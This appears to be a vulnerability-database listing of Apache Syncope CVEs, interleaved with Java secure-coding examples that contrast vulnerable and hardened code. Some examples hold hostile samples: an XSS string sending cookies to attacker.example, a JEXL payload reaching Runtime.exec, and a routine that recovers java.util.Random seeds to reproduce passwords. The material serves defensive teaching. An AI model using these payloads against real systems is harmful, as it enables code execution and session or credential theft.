18 matches found
CVE-2020-11977
What's affected: Apache Syncope 2.1.x (before 2.1.7) with the Flowable extension enabled. Vulnerability: An administrator with workflow entitlements can use Shell Service Tasks to perform malicious operations, including file reads/writes and code execution. Root cause (per sources): Flowable work...
CVE-2018-1322
CVE-2018-1322 affects Apache Syncope: 1.2.x before 1.2.11, 2.0.x before 2.0.8, and some unsupported releases (1.0.x, 1.1.x). The vulnerability allows an administrator with user-search entitlements to recover sensitive security values by manipulating the fiql and orderby parameters. The provided d...
CVE-2018-1321
Apache Syncope vulnerability CVE-2018-1321: An administrator with report and template entitlements can abuse XSLT to perform malicious operations (read/write files, execute code) in affected releases of Apache Syncope 1.2.x before 1.2.11 and 2.0.x before 2.0.8 (plus some unsupported 1.0/1.1 branc...
CVE-2020-1959
CVE-2020-1959 affects Apache Syncope prior to 2.1.6. The vulnerability is a Server-Side Template Injection in Java EL interpolation used in Java Bean Validation custom constraint violation messages. An attacker could inject arbitrary Java EL expressions via error message templates, resulting in u...
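The mechanism behind this entry, as an added illustration that is not Syncope's own code: a custom `ConstraintValidator` that splices the rejected value into a constraint-violation message template. The template is handed to the message interpolator, which resolves `{parameters}` and evaluates `${...}` as Java EL, so an attacker-controlled value containing `${...}` is executed. The `@SafeName` annotation, the 64-character limit and the `escapeTemplate` helper are assumptions made for the example; the escaping follows the Bean Validation template grammar, where a backslash protects `{`, `}`, `$` and `\`.

```java
import java.lang.annotation.ElementType;
import java.lang.annotation.Retention;
import java.lang.annotation.RetentionPolicy;
import java.lang.annotation.Target;
import javax.validation.Constraint;
import javax.validation.ConstraintValidator;
import javax.validation.ConstraintValidatorContext;
import javax.validation.Payload;

// Hypothetical constraint used only to give the validator a type parameter.
@Constraint(validatedBy = SafeNameValidator.class)
@Target(ElementType.FIELD)
@Retention(RetentionPolicy.RUNTIME)
@interface SafeName {
    String message() default "invalid name";
    Class<?>[] groups() default {};
    Class<? extends Payload>[] payload() default {};
}

public class SafeNameValidator implements ConstraintValidator<SafeName, String> {

    private static final int MAX_LEN = 64; // assumed limit for the example

    // Escapes the characters the Bean Validation message-template grammar treats
    // specially, so a user-supplied value is rendered literally instead of being
    // parsed as a {parameter} or evaluated as a ${EL expression}.
    static String escapeTemplate(String value) {
        StringBuilder sb = new StringBuilder(value.length() + 8);
        for (char c : value.toCharArray()) {
            switch (c) {
                case '\\':
                case '{':
                case '}':
                case '$':
                    sb.append('\\');
                    // fall through: emit the character itself after the backslash
                default:
                    sb.append(c);
            }
        }
        return sb.toString();
    }

    @Override
    public boolean isValid(String value, ConstraintValidatorContext ctx) {
        if (value == null || value.length() <= MAX_LEN) {
            return true;
        }
        ctx.disableDefaultConstraintViolation();

        // VULNERABLE (kept as a comment so the class is safe to run): the untrusted
        // value becomes part of the template, and a value such as
        // "${''.getClass().forName('java.lang.Runtime')...}" is evaluated by the
        // EL interpolator when the violation message is built.
        // ctx.buildConstraintViolationWithTemplate("Name too long: " + value)
        //    .addConstraintViolation();

        // HARDENED: escape the value before it reaches the interpolator.
        ctx.buildConstraintViolationWithTemplate("Name too long: " + escapeTemplate(value))
           .addConstraintViolation();
        return false;
    }

    // Stand-alone check of the escaping; no validator bootstrap required.
    public static void main(String[] args) {
        String constructedPayload = "${7*7}";
        System.out.println(escapeTemplate(constructedPayload));
    }
}
```

The hardened branch is the general rule for any `buildConstraintViolationWithTemplate` call that mixes in data the caller did not author; Hibernate Validator additionally lets an application restrict or disable EL in custom violation messages, which is the stronger option where the templates never need it.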
CVE-2018-17186
CVE-2018-17186 affects Apache Syncope: an administrator with workflow entitlements can embed a DTD in a workflow definition and trigger XML External Entity (XXE) processing, which allows reading/writing files and executing code. Multiple sources (CNVD/NVD/OSV/Veracode/GHSA) describe the vulnerability as involving DTD processing to perf...
CVE-2019-17557
CVE-2019-17557 describes a reflected XSS in the Apache Syncope EndUser UI login page, before versions 2.0.15 and 2.1.6, where the UI reflects the successMessage parameter in the URL query string, allowing an attacker to execute arbitrary JavaScript in a user's browser. The issue is caused by insu...
CVE-2020-1961
The CVE-2020-1961 vulnerability affects Apache Syncope: Server-Side Template Injection in Mail templates via JEXL, enabling Remote Code Execution. Affected versions are 2.0.x before 2.0.15 and 2.1.x before 2.1.6. Remediation is to apply the patched releases (2.0.15 and 2.1.6) or equivalent fixes;...
CVE-2018-17184
CVE-2018-17184 affects Apache Syncope (notably syncope-core-persistence-jpa) where a design flaw allows stored XSS via injection of HTML-like elements containing JavaScript into Connector names, Report names, AnyTypeClass keys and Policy descriptions. The issue arises when an administrative user ...
CVE-2024-38503
Apache Syncope HTML-injection vulnerability (CVE-2024-38503) affects the Syncope Console and Enduser UI, where HTML tags can be injected into text fields during edits of users, groups, or other objects, potentially enabling exploits. The issue is documented across multiple sources (NVD, CNVD, Ver...
CVE-2024-45031
Apache Syncope is affected by a Stored XSS vulnerability (CVE-2024-45031) due to incomplete HTML sanitization when editing objects in the Syncope Console and Enduser interfaces. This can allow injection of XSS payloads that trigger for other users during normal usage and could lead to session hij...
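The two output-handling mistakes behind the XSS entries above (the reflected successMessage case and the stored "incomplete sanitization" cases), as an added example that is not code from Syncope. It contrasts a deny-list strip of `<script>` tags, which is bypassed by an event handler on any other element, with HTML encoding for values that are only ever text and an allow-list policy (OWASP java-html-sanitizer) for fields that must keep some markup. The sample inputs are constructed; the allowed element set is an assumption.

```java
import org.owasp.html.HtmlPolicyBuilder;
import org.owasp.html.PolicyFactory;

public final class HtmlInputHandling {

    // Reflected case (cf. successMessage): the value is only ever rendered as
    // text, so encode every HTML-significant character at output time.
    static String escapeHtml(String s) {
        StringBuilder sb = new StringBuilder(s.length() + 16);
        for (char c : s.toCharArray()) {
            switch (c) {
                case '<':  sb.append("&lt;");   break;
                case '>':  sb.append("&gt;");   break;
                case '&':  sb.append("&amp;");  break;
                case '"':  sb.append("&quot;"); break;
                case '\'': sb.append("&#39;");  break;
                default:   sb.append(c);
            }
        }
        return sb.toString();
    }

    // WEAK: the kind of partial sanitization the stored-XSS entries describe.
    // Removing <script> blocks does nothing against <img onerror=...> or
    // <svg onload=...>, and is also defeated by nesting ("<scr<script>ipt>").
    static String stripScriptTags(String s) {
        return s.replaceAll("(?is)<script.*?</script>", "");
    }

    // HARDENED stored case: an allow-list policy keeps only the named elements
    // and drops every attribute (including on* handlers) unless explicitly allowed.
    static final PolicyFactory POLICY = new HtmlPolicyBuilder()
        .allowElements("b", "i", "em", "strong", "p", "br") // assumed allow-list
        .toFactory();

    static String sanitizeStored(String s) {
        return POLICY.sanitize(s);
    }

    public static void main(String[] args) {
        // Constructed reflected payload of the successMessage shape.
        String reflected = "Saved<script>location='https://attacker.example/?c='+document.cookie</script>";
        System.out.println("encoded : " + escapeHtml(reflected));

        // Constructed stored payload for an object description edited in the Console.
        String stored = "<b>Ops</b><img src=x onerror=alert(1)><svg/onload=alert(2)><p>team</p>";
        System.out.println("stripped: " + stripScriptTags(stored)); // handlers survive
        System.out.println("policy  : " + sanitizeStored(stored));  // only <b>,<p> remain
    }
}
```

Which of the two hardened functions applies depends on how the field is rendered: a value shown inside a text node or attribute gets `escapeHtml` at the template layer, while a field the UI deliberately renders as HTML gets the policy on input and again on output, since values stored before the fix are still in the database.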
CVE-2014-3503
Apache Syncope 1.1.x before 1.1.8 is affected. The issue stems from using insecure Random implementations to generate user passwords, enabling remote attackers to guess passwords by brute force. The fixed version is 1.1.8 (Ad libitum); upgrading is advised. If upgrading is not possible, apply off...
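To make the "insecure Random" point concrete, an added example (not Syncope's password generator): the same character-picking loop driven once by `java.util.Random` and once by `java.security.SecureRandom`. `java.util.Random` is a 48-bit linear congruential generator, so its output is a pure function of the seed; `recoverSeed` shows what an attacker does when the seed space is small, here assuming for the illustration that the generator was seeded with a millisecond timestamp inside a known window. The alphabet and the 12-character length are assumptions.

```java
import java.security.SecureRandom;
import java.util.Random;

public final class PasswordGenerator {

    private static final String ALPHABET =
        "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";

    // One shared CSPRNG; SecureRandom is thread-safe and seeds itself from the
    // platform entropy source.
    private static final SecureRandom RNG = new SecureRandom();

    private static String build(int length, Random rnd) {
        StringBuilder sb = new StringBuilder(length);
        for (int i = 0; i < length; i++) {
            sb.append(ALPHABET.charAt(rnd.nextInt(ALPHABET.length())));
        }
        return sb.toString();
    }

    // WEAK: output is fully determined by a 48-bit seed. Two generators with the
    // same seed emit the same "random" password, and the internal state can be
    // recovered from a handful of observed outputs.
    static String weakPassword(int length, long seed) {
        return build(length, new Random(seed));
    }

    // HARDENED: 12 characters from a 62-symbol alphabet drawn from a CSPRNG
    // give about 71 bits of entropy; guessing is no better than brute force.
    static String strongPassword(int length) {
        return build(length, RNG);
    }

    // Attacker side, assuming a timestamp-based seed: scan the window in which the
    // account was created and return the seed that reproduces the observed password,
    // or -1 if none does. Every later password from that seed is then predictable.
    static long recoverSeed(String observed, long fromMillis, long toMillis) {
        for (long seed = fromMillis; seed <= toMillis; seed++) {
            if (weakPassword(observed.length(), seed).equals(observed)) {
                return seed;
            }
        }
        return -1;
    }

    public static void main(String[] args) {
        long issuedAt = 1_400_000_000_123L;              // constructed timestamp seed
        String victim = weakPassword(12, issuedAt);      // password handed to the user
        long found = recoverSeed(victim, issuedAt - 60_000, issuedAt + 60_000);
        System.out.println("weak password " + victim + " reproduced from seed " + found);
        System.out.println("strong password " + strongPassword(12));
    }
}
```

The fix in the advisory is the swap in `strongPassword`; note that it must cover every place a random value is issued to a user (initial passwords, reset tokens, one-time codes), since any of them leaks the generator's state if it comes from `java.util.Random`.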
CVE-2014-0111
CVE-2014-0111 affects Apache Syncope: remote code execution via Apache Commons JEXL expressions in areas such as derived schema definition, user/role templates, and account links of resource mappings. Impact is that an authenticated administrator could inject and execute arbitrary Java code on the...
CVE-2025-65998
CVE-2025-65998 affects Apache Syncope where storing user passwords in the internal database with AES can expose cleartext passwords if the AES key is hard-coded in the source. The issue occurs when the AES option is enabled; the default key value is always used, enabling an attacker with internal...
CVE-2025-57738
CVE-2025-57738 affects Apache Syncope where Groovy-based extensions can be injected by a privileged administrator to execute code remotely. The cited advisories describe that Groovy code execution arises from runtime-loaded Groovy implementations, enabling remote execution within a running Syncop...
CVE-2026-42782
CVE-2026-42782 affects Apache Syncope 3.0 through 3.0.16, 4.0 through 4.0.5, and 4.1.0, caused by improper isolation that lets an administrator with sufficient entitlements load a malicious Groovy class whose static initializer reaches a non-sandboxed execution path. Remediation is to upgrade to 4.0.6 or 4.1.1, ...
CVE-2026-42797
CVE-2026-42797 (Apache Syncope) is an information disclosure reached through a crafted JEXL expression. An administrator with entitlements for Derived Schemas can craft a malicious JEXL expression that, if the requester also has User-read privileges, may access security-sensitive...
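The JEXL entries on this page (CVE-2014-0111, CVE-2020-1961 and CVE-2026-42797) share one root cause: an expression authored by a privileged user is evaluated by an engine that can reach arbitrary classes by reflection. The added example below is not Syncope's code; it shows, with Apache Commons JEXL 3.x, an unrestricted engine next to one built with an allow-list `JexlSandbox`, and a constructed derived-attribute expression next to a constructed payload that walks from a string literal to `java.lang.Runtime`. The context variables `username` and `email` and the choice to permit only `java.lang.String` are assumptions made for the illustration.

```java
import org.apache.commons.jexl3.JexlBuilder;
import org.apache.commons.jexl3.JexlContext;
import org.apache.commons.jexl3.JexlEngine;
import org.apache.commons.jexl3.JexlException;
import org.apache.commons.jexl3.MapContext;
import org.apache.commons.jexl3.introspection.JexlSandbox;

public final class JexlTemplateEval {

    // Unrestricted engine: every class reachable through reflection is usable,
    // so an administrator-supplied template can end up calling Runtime.exec.
    static final JexlEngine UNRESTRICTED = new JexlBuilder().create();

    // Allow-list engine: new JexlSandbox(false) blocks every class that is not
    // explicitly permitted. Only String members (and the context variables,
    // which are not class lookups) remain callable.
    static final JexlEngine SANDBOXED;
    static {
        JexlSandbox sandbox = new JexlSandbox(false);
        sandbox.white(String.class.getName()); // allow(...) in JEXL 3.3+
        SANDBOXED = new JexlBuilder()
            .sandbox(sandbox)
            .strict(true)    // unresolvable members throw instead of yielding null
            .silent(false)   // surface the JexlException to the caller
            .create();
    }

    static Object evaluate(JexlEngine engine, String expression, JexlContext ctx) {
        return engine.createExpression(expression).evaluate(ctx);
    }

    public static void main(String[] args) {
        JexlContext ctx = new MapContext();
        ctx.set("username", "alice");
        ctx.set("email", "alice@example.org");

        // Legitimate derived-attribute / mail-template style expression.
        String benign = "username + ' <' + email + '>'";
        // Constructed RCE payload of the shape the advisories describe: String ->
        // Class.forName -> Runtime.getRuntime().exec. Never fed to UNRESTRICTED here.
        String hostile = "''.getClass().forName('java.lang.Runtime').getRuntime().exec('id')";

        System.out.println("unrestricted, benign : " + evaluate(UNRESTRICTED, benign, ctx));
        System.out.println("sandboxed,    benign : " + evaluate(SANDBOXED, benign, ctx));
        try {
            evaluate(SANDBOXED, hostile, ctx);
        } catch (JexlException e) {
            // ''.getClass() is a String member and passes; forName is invoked on a
            // java.lang.Class instance, which the sandbox does not permit.
            System.out.println("sandboxed,    hostile: blocked (" + e.getMessage() + ")");
        }
    }
}
```

A sandbox of this kind limits what an expression can touch; it does not remove the information-disclosure angle of CVE-2026-42797, where the expression stays within permitted objects but reads attributes the author should not see. That case needs the evaluation context itself to expose only the attributes the requesting user is entitled to read.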
CVE-2026-23795
CVE-2026-23795 describes an XML External Entity (XXE) vulnerability in the Apache Syncope Console. An administrator with sufficient entitlements to create or edit Keymaster parameters can craft malicious XML text to trigger XXE, potentially leaking sensitive data. Affected versions: Apache Syncop...
CVE-2026-23794
Summary: CVE-2026-23794 is a reflected XSS affecting the Apache Syncope Enduser Login page. An attacker can lure a user to click a crafted link and, upon login, potentially steal credentials. Affected versions: 3.0 through 3.0.15 and 4.0 through 4.0.3. Remediation: upgrade to 3.0.16 or 4.0.4 (or later). The CVSS v3.1...